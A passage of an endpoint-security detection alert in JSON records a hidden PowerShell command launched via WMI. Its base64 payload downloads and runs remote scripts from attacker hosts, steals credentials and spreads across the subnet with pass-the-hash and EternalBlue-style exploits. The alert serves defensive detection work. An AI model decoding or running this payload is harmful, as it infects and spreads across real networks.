AAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20200719101800,"sig_rev":1},"detection":"apde:20200719101800","end_ts":1610640884,"engine":"apde","id":"cF3A8bacac","name":"PowerShell Download String","observables":{"file":[{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1},{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1}]},"remediated":false,"severity":"medium","silent":true,"start_ts":1610640884,"tactics":["TA0002","TA0005"],"techniques":["T1059"],"type":"activity","normalized":{"observables":{"file":{"name":["wmiprvse.exe","powershell.exe"],"path":["c:\\windows\\system32\\wbem","c:\\windows\\system32\\windowspowershell\\v1.0"]}},"name":"powershell download string"},"ts":1610640884},"tactics":["TA0002","TA0005"],"techniques":["T1059"]}} 